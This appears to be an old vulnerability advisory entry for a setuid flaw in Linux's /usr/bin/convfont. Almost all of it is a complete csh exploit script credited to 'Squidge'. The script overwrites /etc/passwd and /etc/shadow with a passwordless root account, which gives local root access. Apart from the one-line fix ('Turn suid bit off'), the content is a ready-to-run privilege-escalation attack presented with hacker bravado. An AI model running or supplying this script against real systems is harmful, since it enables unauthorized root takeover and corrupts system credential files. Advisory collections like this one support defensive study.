COMMAND
/usr/bin/convfont
SYSTEMS AFFECTED
Linux
PROBLEM
The following is convfont shell script exploit by Squidge. This
will get you a root.
#!/bin/csh
echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"
#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
# PW_TYPE = "plain" is for a normal /etc/passwd
# PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo
setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin
echo " "
echo "determining system type"
if ( -e /etc/shadow ) then
# aha ! is a shadow system
echo "found a shadow password system. good job we're ueberhackers :)"
set PW_TYPE = shadow
else
echo "found a normal password system. make some effort, mr root !"
set PW_TYPE = plain
endif
set loop = 0
set limit = 100
echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh
if ($PW_TYPE == "shadow" ) then
echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
while ( $loop < $limit ) @loop++
echo >> /tmp/passwd " "
echo >> /tmp/shadow " "
echo -n .
end
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"
cp /etc/passwd /tmp/real.passwd
if ( $PW_TYPE == "shadow" ) then
echo "unable to backup /etc/shadow tho, as it is mode 600"
endif
convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null
if ( $status != 0 ) then
echo "\!\!\! warning. Something dodgy occured. It could be:"
echo " convfont isn't installed"
echo " convfont isn't setuid root"
exit
endif
echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo " *******************"
rm -f /tmp/passwd /tmp/shadow
SOLUTION
Turn suid bit off.